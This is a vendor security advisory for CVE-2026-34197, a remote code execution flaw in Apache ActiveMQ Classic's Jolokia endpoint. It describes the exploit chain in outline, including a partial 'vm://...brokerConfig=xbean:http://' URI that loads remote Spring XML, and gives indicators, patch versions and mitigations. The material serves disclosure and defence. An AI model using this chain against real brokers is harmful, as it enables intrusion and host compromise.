New in NodeZero®

Additional visibility into Iranian-backed threat actor activity | Available now to all customers

CVE-2026-34197

Apache ActiveMQ Classic Code Injection

Apache ActiveMQ Classic contains an authenticated remote code execution vulnerability in its Jolokia JMX-HTTP bridge exposed through the web console. The issue affects Apache ActiveMQ Broker before 5.19.4 and from 6.0.0 before 6.2.3. An authenticated attacker can supply a crafted URI to broker management operations, causing the broker to load a malicious remote Spring XML configuration and execute arbitrary code within the JVM.

This vulnerability was discovered by Horizon3.ai and reflects a deeper issue that has effectively existed for over a decade, emerging from the interaction of multiple legitimate features rather than a single coding flaw.

On affected versions where Jolokia is exposed without authentication (CVE-2024-32114), this vulnerability can be exploited without credentials, enabling unauthenticated remote code execution.

Technical Details

CVE-2026-34197 is an authenticated code injection vulnerability in Apache ActiveMQ Classic’s exposure of the Jolokia JMX-HTTP bridge at /api/jolokia/.

The Jolokia endpoint allows execution of MBean operations. By default, it permits exec access to ActiveMQ MBeans, including:

  • BrokerService.addNetworkConnector(String)
  • BrokerService.addConnector(String)

These operations accept a URI as input. An attacker can supply a crafted URI using the xbean: protocol, which causes ActiveMQ to load a remote Spring XML application context.

This exposure stems from prior hardening changes that restricted Jolokia access broadly while allowing unrestricted operations on ActiveMQ MBeans, unintentionally exposing dangerous functionality.

Stop Guessing, Start Proving

Diagram showing exploitation of Apache ActiveMQ via Jolokia API leading to remote code execution through malicious configuration loading
Schedule a demo

The exploit chain works as follows:

  • The attacker invokes addNetworkConnector through Jolokia
  • A crafted vm:// URI is supplied with brokerConfig=xbean:http://...
  • ActiveMQ attempts to create a broker using the attacker-controlled configuration
  • Spring loads the remote XML and instantiates beans
  • Malicious beans invoke Java methods such as Runtime.exec()

The result is arbitrary code execution as the ActiveMQ service user.

This vulnerability becomes significantly more dangerous when combined with:

  • Weak or default web console credentials (commonly admin:admin)
  • Exposed Jolokia endpoints
  • CVE-2024-32114, which removes authentication requirements entirely on some versions

An attacker who reaches the web console can move directly to code execution and full host compromise.

NodeZero® Proactive Security Platform — Rapid Response

A Rapid Response test for CVE-2026-34197 enables organizations to quickly validate whether their Apache ActiveMQ Classic environment is actually exploitable.

  • Run the Rapid Response test: Launch the test from the NodeZero platform to determine whether an attacker can execute this path in your environment
  • Patch immediately: Upgrade to fixed versions and restrict exposure of the web console and Jolokia endpoints
  • Re-run the Rapid Response test: Validate that remediation actions have eliminated the exploit path

Version checks don’t tell you if you’re exposed. This test does.

Indicators of Compromise

At the time of publication, no vendor-provided indicators of compromise have been released. However, exploitation leaves clear and high-signal traces.

IndicatorTypeDescription
/api/jolokia/ requestsHTTP activitySuspicious POST requests invoking exec operations on ActiveMQ MBeans
addNetworkConnector usageApplication behaviorInvocation with unexpected or external URIs
vm://...brokerConfig=xbean:http://Log artifactStrong indicator of exploitation attempt loading remote Spring XML
Outbound HTTP requestsNetwork activityConnections from the broker to attacker-controlled infrastructure
Unexpected process executionHost behaviorChild processes spawned by the ActiveMQ Java process

Note: Code execution occurs during the connection attempt. Error or failure messages in logs may appear after the payload has already executed.

Affected versions & patch

Affected:

  • Apache ActiveMQ Broker before 5.19.4
  • Apache ActiveMQ Broker from 6.0.0 before 6.2.3
  • Apache ActiveMQ activemq-all before 5.19.4
  • Apache ActiveMQ activemq-all from 6.0.0 before 6.2.3

Patch:

  • Upgrade to Apache ActiveMQ Classic 5.19.4 or 6.2.3 or later

The patch removes the ability for addNetworkConnector to instantiate vm:// transports, eliminating the code execution path.

Interim mitigation:

  • Restrict access to the ActiveMQ web console to trusted networks only
  • Disable or tightly control access to the Jolokia JMX-HTTP bridge
  • Remove default credentials and enforce strong authentication
  • Limit which users can invoke broker management operations

Timeline

  • March 22, 2026: Horizon3.ai reports the vulnerability to Apache
  • March 26, 2026: Apache ActiveMQ team acknowledges the report and assigns CVE-2026-34197
  • March 30, 2026: Apache releases ActiveMQ Classic version 6.2.3 with a fix
  • April 6, 2026: Apache publishes the security advisory for CVE-2026-34197
  • April 7, 2026: CVE-2026-34197 is publicly published

References

Read about other CVEs

NodeZero® Platform

Implement a continuous find, fix, and verify loop with NodeZero

The NodeZero® platform empowers your organization to reduce your security risks by autonomously finding exploitable weaknesses in your network, giving you detailed guidance around how to priortize and fix them, and having you immediately verify that your fixes are effective.
Explore NodeZero

Recognized By